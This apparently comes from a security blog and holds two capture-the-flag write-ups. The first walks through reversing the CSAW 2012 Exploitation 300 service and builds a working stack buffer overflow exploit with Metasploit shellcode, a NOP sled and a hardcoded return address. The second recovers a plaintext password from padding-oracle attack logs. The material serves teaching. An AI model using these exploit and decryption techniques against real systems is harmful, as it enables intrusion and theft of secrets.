聊天 – CSAW Exploitation 300

This challenge covers many of the basics involved in reverse engineering and exploit development, so I think it’s a great candidate to walk step-by-step through service exploitation with the assumption you know the concepts but may be inexperienced in the tooling.

We can start the service, then run netstat to see it listens on tcp 4842, but it doesn’t look like we can interact with it very much without figuring out what kind of requirements it has.

root@bt:~/Desktop/csaw_2012/300# ./2012_csawexp300 &
[1] 3046
root@bt:~/Desktop/csaw_2012/300# netstat -pantu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      2985/sshd       
tcp        0      0 127.0.0.1:7337          0.0.0.0:*               LISTEN      937/postgres    
tcp        0      0 0.0.0.0:4842            0.0.0.0:*               LISTEN      3046/2012_csawexp30
tcp        0      0 10.81.154.50:22         10.81.152.113:58183     ESTABLISHED 2987/4          
tcp        0      0 127.0.0.1:4842          127.0.0.1:34863         TIME_WAIT   -               
tcp6       0      0 :::22                   :::*                    LISTEN      2985/sshd       
tcp6       0      0 ::1:7337                :::*                    LISTEN      937/postgres    
udp        0      0 0.0.0.0:68              0.0.0.0:*                           1105/dhclient3  
udp6       0      0 ::1:36573               ::1:36573               ESTABLISHED 937/postgres    
root@bt:~/Desktop/csaw_2012/300# nc localhost 4842
连接接受。
无法获取用户密码输入: liaotian.
root@bt:~/Desktop/csaw_2012/300#

Also, don’t forget to disable ASLR.


root@bt:~/Desktop/csaw_2012/300# echo '0' > /proc/sys/kernel/randomize_va_space 

At the moment, we’re not sure what the service is supposed to do or how to run it properly, so we’ll reverse it a bit to learn how it works. If you’re reversing with IDA, when you open the ELF file, you’re dropped into the program’s entry point.

Getting to main is accomplished by double clicking the function (sub_804884F) in the push instruction prior to the call to libc_start_main. It’s a good idea to rename (with ‘n’) any function whose purpose you learn as you go to make navigation easier and to keep track of what you’ve already looked at.

Inside of main we have a few calls to some other functions, it turns out for this binary, only the first function is important to us. The rest just set up service’s connection handling, etc., and since we already know what port is listens on, we don’t need to investigate these functions further.

Stepping into the first function that is called (double click sub_8048A3D), we see code that just sets up various signals. Whenever I encounter any libc function that I don’t remember the specifics of, it’s always useful to take a look at the man page to be reminded of what parameters it expects.

root@bt:~/Desktop/csaw_2012/300# man signal 7

--------------

SIGNAL(2)                                                  Linux Programmer's Manual                                                  SIGNAL(2)

NAME
       signal - ANSI C signal handling

SYNOPSIS
       #include <signal.h>

       typedef void (*sighandler_t)(int);

       sighandler_t signal(int signum, sighandler_t handler);

DESCRIPTION
       The  behavior  of  signal() varies across Unix versions, and has also varied historically across different versions of Linux.  Avoid its
       use: use sigaction(2) instead.  See Portability below.

       signal() sets the disposition of the signal signum to handler, which is either SIG_IGN, SIG_DFL, or the address of a  programmer-defined
       function (a "signal handler").

Signal takes two arguments, a number and a handler. Looking at our disassembly, 3 signals are set up. Since signals will be raised by signums which may not be easy to remember, it might be useful to keep track of signum/function mappings for programs that have many.

Analyzing the first handler (sub_8048834), we see it simply prints a message then calls exit.

This probably won’t be critical for our purposes; if we see this signal being raised, we probably did something wrong and caused the program to terminate. (Note, IDA won’t display Chinese characters correctly without installing an add-on or using one of the more recent pro versions.) Hitting <Esc> takes us back to where we were with the signals, and diving into the next handler (sub_804898C) shows a more interesting function.

The string “liaotian” is set as the argument to sub_8048BC0, and analyzing that function shows calls to getpwnam, setgroups, setgid, setuid, seteuid, setegid, and chdir. This function is just setting the service up to run under the liaotian user, which is why we weren’t able to run it before. After creating the liaotian user, we can use the service.

root@bt:~/Desktop/csaw_2012/300# ./2012_csawexp300 &
[1] 3204
root@bt:~/Desktop/csaw_2012/300# nc localhost 4842
连接接受。
这部分并不难,但我希望你有乐趣。如果你给我大量的数据,它可能是一件坏事会发生.
信号读取。

Despite the hint in the Chinese message above that this contains an overflow, we saw a fork earlier in our disassembly, so we won’t notice a crash in the service if we start sending it data now. Jumping back to IDA, if we look at the next function call after the service is set up (sub_80488E0), we see the code for the service’s response we just observed while connecting to it.

After sending us some string, the signal (signum 1Fh) is raised. Hitting <Esc> twice in IDA (or clicking on the signal setup function if you’ve been diligent in renaming your functions as you learn what they do), will take us back to the signal area and we see signum 1Fh refers to the third signal handler.

The function sub_80488C8 calls another function sub_804889E which uses read().

root@bt:~/Desktop/csaw_2012/300# man read 7

----------

READ(2)                                         Linux Programmer's Manual                                        READ(2)

NAME
       read - read from a file descriptor

SYNOPSIS
       #include <unistd.h>

       ssize_t read(int fd, void *buf, size_t count);

DESCRIPTION
       read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.

       If  count  is zero, read() returns zero and has no other results.  If count is greater than SSIZE_MAX, the result
       is unspecified.

So read() will copy N bytes from a file descriptor (which is a socket in our case) into a destination buffer. According to IDA, 348 bytes (15Ch) are allocated on the stack for local variables (like dest_buffer), and 2048 bytes are read from the socket, so we have a buffer overflow.

Now that we know what our attack needs to do, we can make debugging the exploit we’re about to write easier by removing the call to fork from the service. (# man fork 7)

If you click on any instruction, IDA displays the the offset in the file in the lower left corner.

By opening the binary in a hex editor and going to the offset, we can NOP out the three outlined instructions instructions, starting at offset 99B. If we were to only NOP out the call to fork, the “test eax, eax” immediately after would always fail. I used HxD (Hexedit) on Windows, but if you’re in backtrack, ‘bless’ is a good choice that does basically the same thing. In HxD, use the CTRL + G shortcut to go to an offset and enter 99B, which we got from IDA which will take us to the call to fork. 0xE8 is the opcode for ‘call’.

Instructions in relation to number of opcodes varies, so to make sure we don’t NOP too few or too many opcodes, we could either look up the offsets in IDA for each instruction up to the mov instruction following our target area, or figure out what the opcodes look like using something like metasploit’s nasm_shell.rb. Else, we could find the opcodes just using Google/Bing/Ask Jeeves.

root@bt:/opt/metasploit/apps/pro/msf3/tools# ./nasm_shell.rb 
nasm > call 0xffffffff
00000000  E8FAFFFFFF        call dword 0xffffffff
nasm > test eax, eax
00000000  85C0              test eax,eax
nasm > 

Make the changes by writing NOPs (0x90) over these instructions and save the image (I named it nofork-2012_csawexp300).

Opening the new image in IDA confirms our edit. But note that you’ll need to reanalyze the file to see these changes since IDA’s db will still show the old instructions otherwise.

Before we finish with IDA, let’s also take note of the address where the read() is performed. We’ll save that for later when debugging our exploit. Recall that clicking an instruction will give us the offset in the file, but IDA will also give us virtual address in the area to the right of where the offset is displayed. The address we’re interested in (080488BC).

Observing a triggered segfault is now pretty easy. The rest of the process is now exploit development.

Let’s start our service in GDB and see what happens when we connect to it and send it our overflow payload of “A”s.

Since GDB will alert us whenever the signals are raised, just type ‘c’ to continue.

If we set our breakpoint in GDB with the address of the read, we can take a look at the memory before the crash. Use the ‘nexti’ command to go to the next instruction and examine memory again to find our “A”s (0x41) and see where in memory our payload is.

(gdb) break *0x80488BC
Breakpoint 1 at 0x80488bc
(gdb) r
Starting program: /root/Desktop/csaw_2012/300/nofork-2012_csawexp300 
warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).


Program received signal SIGUSR1, User defined signal 1.
0xf7fdf430 in __kernel_vsyscall ()
(gdb) c
Continuing.
连接接受。

Program received signal SIGSYS, Bad system call.
0xf7fdf430 in __kernel_vsyscall ()
(gdb) c
Continuing.
信号读取。

Breakpoint 1, 0x080488bc in ?? ()
(gdb) x/150x $esp
0xffffc900:	0x00000006	0xffffc916	0x00000800	0x00000000
0xffffc910:	0x00000000	0x00000000	0x00009528	0x00009528
0xffffc920:	0x00000005	0x00001000	0x00000001	0x00009ee8
0xffffc930:	0x0000aee8	0x0000aee8	0x000001cc	0x000003e4
0xffffc940:	0x00000006	0x00001000	0x00000002	0x00009efc
0xffffc950:	0x0000aefc	0x0000aefc	0x000000e0	0x000000e0
0xffffc960:	0x00000006	0x00000004	0x00000004	0x00000134
0xffffc970:	0x00000134	0x00000134	0x00000044	0x00000044
0xffffc980:	0xffffc9b8	0x00000010	0xf7fdc000	0xf7f26f93
0xffffc990:	0xf7fbcff4	0xf7ecee64	0x00000001	0xf7fdc000
0xffffc9a0:	0x00000010	0xf7fbd4e0	0xffffffff	0xffffffff
0xffffc9b0:	0xf7fbd4e0	0xf7fdc000	0xffffc9e4	0xf7eceaef
0xffffc9c0:	0xf7fbd4e0	0xf7fdc000	0x00000010	0x00000014
0xffffc9d0:	0x00000003	0x00554e47	0xf7fbcff4	0x00000010
0xffffc9e0:	0x0000000f	0xffffc9f4	0xf7ecee06	0x00000010
0xffffc9f0:	0xf7fbd4e0	0xffffca18	0xf7ecf928	0xf7fbd4e0
0xffffca00:	0xf7fdc000	0x00000010	0x0000000a	0xf7fbcff4
0xffffca10:	0xf7fbd4e0	0x0000000f	0xffffca30	0xf7ed209a
0xffffca20:	0xf7fbd4e0	0x0000000a	0xf7fbcff4	0xf7fbe360
0xffffca30:	0xffffca58	0xf7ec5acb	0xf7fbd4e0	0x0000000a
0xffffca40:	0x0000000f	0xf7e668d0	0xf7fbd4e0	0x00000e04
0xffffca50:	0x00000000	0xf7fbcff4	0xffffd128	0x080488dc
0xffffca60:	0x08048e23	0x00000000	0x00000006	0x0804d6c8
0xffffca70:	0xf7fb0006	0xf7fef0a0	0xf7fcb239	0xf7fdf400
0xffffca80:	0x0000001f	0x00000063	0x00000000	0x0000002b
0xffffca90:	0x0000002b	0xf7fbcff4	0x00000000	0xffffd128
0xffffcaa0:	0xffffd110	0x00000e04	0x0000001f	0x00000e04
0xffffcab0:	0x00000000	0x00000001	0x00000000	0xf7fdf430
0xffffcac0:	0x00000023	0x00000296	0xffffd110	0x0000002b
0xffffcad0:	0xffffcd5c	0x00000200	0x00000000	0x0804d5d8
0xffffcae0:	0x00000003	0x0804d060	0x00000000	0x00000000
0xffffcaf0:	0x00000001	0x0000078a	0x0804d6c8	0xf7fde9e0
0xffffcb00:	0xf7fcaaec	0xf7e73eb0	0xf7fca71c	0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) nexti
0x080488c1 in ?? ()
(gdb) x/150x $esp
0xffffc900:	0x00000006	0xffffc916	0x00000800	0x00000000
0xffffc910:	0x00000000	0x41410000	0x41414141	0x41414141
0xffffc920:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc930:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc940:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc950:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc960:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc970:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc980:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc990:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9a0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9b0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9c0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9d0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9e0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9f0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca00:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca10:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca20:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca30:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca40:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca50:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca60:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca70:	0x41414141	0xf7fef00a	0xf7fcb239	0xf7fdf400
0xffffca80:	0x0000001f	0x00000063	0x00000000	0x0000002b
0xffffca90:	0x0000002b	0xf7fbcff4	0x00000000	0xffffd128
0xffffcaa0:	0xffffd110	0x00000e04	0x0000001f	0x00000e04
0xffffcab0:	0x00000000	0x00000001	0x00000000	0xf7fdf430
0xffffcac0:	0x00000023	0x00000296	0xffffd110	0x0000002b
0xffffcad0:	0xffffcd5c	0x00000200	0x00000000	0x0804d5d8
0xffffcae0:	0x00000003	0x0804d060	0x00000000	0x00000000
0xffffcaf0:	0x00000001	0x0000078a	0x0804d6c8	0xf7fde9e0
0xffffcb00:	0xf7fcaaec	0xf7e73eb0	0xf7fca71c	0x00000000

If we spent time developing our exploit now, we’d soon find out that the buffer size for the destination buffer used in the read() call we thought was 348 bytes in length was inaccurate and we’d get a segfault despite thinking we’re overwriting the return address. The buffer is actually a bit smaller than 348 bytes; that is, the stack has 348 bytes to be used for local variables, but they’re not all for dest_buffer. One trick we can use to find the actual buffer size is to use metasploit’s pattern_create and pattern_offset tools. These work by creating long strings that we can use to fill memory / registers, and find offsets for specific parts of the pattern we get when we examine areas of memory or registers we’re interested in by feeding it back to the pattern_offset tool. Let’s generate a pattern that is 350 bytes in length, input that to our service, and see what happens in GDB.

root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb 
Usage: pattern_create.rb length [set a] [set b] [set c]
root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb  350
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al

------------------

(gdb) r
Starting program: /root/Desktop/csaw_2012/300/nofork-2012_csawexp300 
warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).


Program received signal SIGUSR1, User defined signal 1.
0xf7fdf430 in __kernel_vsyscall ()
(gdb) c
Continuing.
连接接受。

Program received signal SIGSYS, Bad system call.
0xf7fdf430 in __kernel_vsyscall ()
(gdb) c
Continuing.
信号读取。

Program received signal SIGSEGV, Segmentation fault.
0x396b4138 in ?? ()
(gdb) 

------------------

root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 0x396b4138
326

Actual buffer length is 326 bytes. We’re ready to write our exploit. I picked a return address on the stack (0xffffc990). If you have issues with the address you pick, keep in mind things can be laid out differently in memory whether you start a program from within a debugger or not. You can always attach to the process from within GDB with the PID (attach 12345). Our shellcode can be generated with msfpayload. I don’t think there are any bad characters you need to worry about since I think read() will copy N bytes and won’t terminate early based on the contents of those bytes. Our shellcode will just execute a command to create a flag file for RCE demonstration purposes.

root@bt:/opt/metasploit/msf3# ./msfpayload linux/x86/exec CMD="/usr/bin/touch /tmp/flag" y
# linux/x86/exec - 60 bytes
# http://www.metasploit.com
# VERBOSE=false, PrependSetresuid=false, 
# PrependSetreuid=false, PrependSetuid=false, 
# PrependChrootBreak=false, AppendExit=false, 
# CMD=/usr/bin/touch /tmp/flag
buf = 
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" +
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x19\x00\x00" +
"\x00\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x74\x6f\x75\x63" +
"\x68\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x61\x67\x00\x57\x53" +
"\x89\xe1\xcd\x80"

Our exploit:

import socket

buffersize = 326

shellcode = (
#msfpayload: /usr/bin/touch /tmp/flag
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" +
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x19\x00\x00" +
"\x00\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x74\x6f\x75\x63" +
"\x68\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x61\x67\x00\x57\x53" +
"\x89\xe1\xcd\x80"
)

nops = "\x90" * (buffersize - len(shellcode))
ret = "\x90\xc9\xff\xff"
payload = nops + shellcode + ret

s = socket.socket()
s.connect(('localhost', 4842))
s.recv(1024)
s.sendall(payload)
s.close
print "Sent"

Running this exploit gives us some discouraging results in that our shellcode seems to fail. After talking to Rich, it turns out since our shellcode is so close to ESP, there can be interference. The trick he showed me (in addition to using nasm_shell.rb) is to just move ESP somewhere else. We’ll add one instruction to the beginning of our shellcode to do this. Our updated exploit:

root@bt:/opt/metasploit/apps/pro/msf3/tools# ./nasm_shell.rb nasm 
> add esp, -450
00000000  81C43EFEFFFF      add esp,0xfffffe3e
nasm > 

----------

import socket

buffersize = 326

shellcode = (
#add esp, -450
"\x81\xC4\x3E\xFE\xFF\xFF"

#msfpayload: /usr/bin/touch /tmp/flag
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" +
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x19\x00\x00" +
"\x00\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x74\x6f\x75\x63" +
"\x68\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x61\x67\x00\x57\x53" +
"\x89\xe1\xcd\x80"
)

nops = "\x90" * (buffersize - len(shellcode))
ret = "\x90\xc9\xff\xff"
payload = nops + shellcode + ret

s = socket.socket()
s.connect(('localhost', 4842))
s.recv(1024)
s.sendall(payload)
s.close
print "Sent"

Our result:

Advertisements

Oracle Padding Attack Challenge

A friend of mine sent me a crypto challenge from an online course he was taking that I had a lot of fun solving. The details are available here. If you’re unfamiliar with how oracle padding attacks work or think they pertain to Oracle (proper noun), you should check out the following references and try to solve the challenge prior to reading the rest of this post.

http://esec-lab.sogeti.com/post/2010/12/03/Padding-Oracle-attack-and-its-applications-on-ASP.NET

http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html

For this challenge, we’re given web server logs that appear to show an attacker exploiting this vulnerability. Our objective: to capture the secret data.

The logs show someone is brute forcing to determine when their guess results in the correct padding. In oracle padding attacks, the attacker needs to figure out what the indicator for a successful guess is. Sometimes it’s different page response, but in this case, it’s a 404 HTTP error response code. This lets us reduce the amount of log data we need to pay attention to since every 403 is just an incorrect guess and can be ignored.

$ egrep ' 404' proj4-log.txt 
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020202020d8cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /2020202020202020202020202020eddbcac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020deecdacac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020ffd9ebddcac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /2020202020202020202020fbfed8eadccac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /2020202020202020202089f8fddbe9dfcac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /2020202020202020203c88f9fcdae8decac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020207c3387f6f3d5e7d1cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020057d3286f7f2d4e6d0cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
...
...

We’ll come back to this later, but for now we can see the patterns where each byte is progressively, individually brute forced. We also notice the attacker has divided the original 80 byte encrypted string into 5 16-byte blocks and has prepended a starting block of 20’s to target the padding oracle specifically. Most algorithms divide data into 8 or 16 byte blocks, so this makes sense.

To more easily see what’s going on, we can split up the string into 16 byte chunks which show the attackers initial guesses. I’ve deliberately added spaces to the GET snippets throughout the rest of this write up to make visualization easier.

1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020202001 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 403
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020202000 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 403
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020202003 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 403
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020202002 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 403
…
…
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020202020d8 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404

Though in slightly out of order, the attacker tried 01, 00, 03, 02.. and proceeded to continue incrementing the last byte by one until hitting the 404 response code; the successful padding guess. The first 404 (first line of our egrep) reveals the request that guessed the correct value to supply so that the decrypted last byte would be 0x01:

1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020202020d8 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404

This means that when 0xd8 is supplied in the request and decrypted by the server, it will decrypt to 0x01 and the padding will be correct. So if we XOR 0xd8 and 0x1, we get 0xd9. We can now encrypt and decrypt arbitrary data for just that one byte by XOR-ing whatever we want with 0xd9.

>>> hex(0xd8 ^ 0x01)
'0xd9'

Now that we know 0xd9, we can guess that the attacker moved on to brute forcing the next byte to find out when the padding is correct for two bytes. To do that, the attacker needs to make the decrypted value come out to 0x02 0x02. We can do that only for the last byte ourselves since we know 0xd9:

>>> hex(0xd9 ^ 0x02)
'0xdb'

If we look at the raw logs to the line right after the initial successful guess, we see the attacker changes the last byte from 0xd8 to 0xdb and the brute force attack for the next byte begins:

1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020202020d8 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020202002db cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 403

When that byte is discovered, we can move to 0x03, and so on. Since there are 16 bytes in our blocks, and there must be at least one byte of padding, the attack for each of the 5 blocks ends when a full block of padding is identified. After identifying this full block that can be XORed with 0x10’s, the attacker starts over with the next block:

1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /dce6acb565dd951c642b9feeebcdffc9 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404 <- Got full block
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020202001 084b0199778f14767cbdc989872a1f7d HTTP/1.1" 403 <- Starting over with next block

Looking through the logs is great actually because the attacker did all the work for us. We can ignore all of this byte-by-byte brute forcing and skip straight to the end of each block’s brute force where the full block of padding is identified. This is what the attacker was working towards anyways:

1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /dce6acb565dd951c642b9feeebcdffc9 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /afa631b5b91c019dd9dcd464e333b164 084b0199778f14767cbdc989872a1f7d HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /6b2866e615fb39441cccbdfdfe54684d a59da498c81017fd2adc534610b412e4 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /daffd5ebb46574cd5bbe267664c56c93 8f50d05513a440425f5ca434e5cb29c6 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /fa32af307095725b4645bd2dfcd230df b9110412ebeb347ee63a6b1849794f92 HTTP/1.1" 404

With these 5 lines of information, we have enough to decrypt the original string and solve the challenge. If you whip up a script to XOR the bytes of two blocks for you, you can start XORing stuff together. Or just do it interactively:

$ python
>>> 0xFFFFFFFF ^ 0x10101010
4025479151
>>> hex(0xFFFFFFFF ^ 0x10101010)
'0xefefefef'

We’ll build a quick list of intermediary values first, but note that to decrypt a block you XOR the intermediary value with the previous cipher text block (or IV for the first block) to get the clear text. The script used below just outputs the result of the XOR and also the corresponding ASCII.

We’ll XOR the results of the brute force against a full block of 0x10 padding for each of the 5 blocks.

$ python xor.py dce6acb565dd951c642b9feeebcdffc9 10101010101010101010101010101010
ccf6bca575cd850c743b8ffefbddefd9
????uͅ
     t;??????

$ python xor.py afa631b5b91c019dd9dcd464e333b164 10101010101010101010101010101010
bfb621a5a90c118dc9ccc474f323a174
??!??
     ????t?#?t

$ python xor.py 6b2866e615fb39441cccbdfdfe54684d 10101010101010101010101010101010
7b3876f605eb29540cdcadedee44785d
{8v??)T

       ܭ

$ python xor.py daffd5ebb46574cd5bbe267664c56c93 10101010101010101010101010101010
caefc5fba47564dd4bae366674d57c83
?????ud?K?6ft?|?

$ python xor.py fa32af307095725b4645bd2dfcd230df 10101010101010101010101010101010
ea22bf206085624b5655ad3decc220cf
?"? `?bKVU?=?? ?

Now, we start decrypting the original blocks by taking these results and XOR-ing it with the cipher text of the previous block (so we don’t actually need the first result from xor.py above).

$ python xor.py cac544d7942e50e1a0afa156c803d115 bfb621a5a90c118dc9ccc474f323a174
757365723d22416c696365223b207061
user="Alice"; pa

$ python xor.py 084b0199778f14767cbdc989872a1f7d 7b3876f605eb29540cdcadedee44785d
7373776f72643d2270616464696e6720
ssword="padding 

$ python xor.py a59da498c81017fd2adc534610b412e4 caefc5fba47564dd4bae366674d57c83
6f7261636c6573206172652064616e67
oracles are dang

$ python xor.py 8f50d05513a440425f5ca434e5cb29c6 ea22bf206085624b5655ad3decc220cf
65726f75732122999999999
erous!" 

Our decrypted string: user=”Alice”; password=”padding oracles are dangerous!”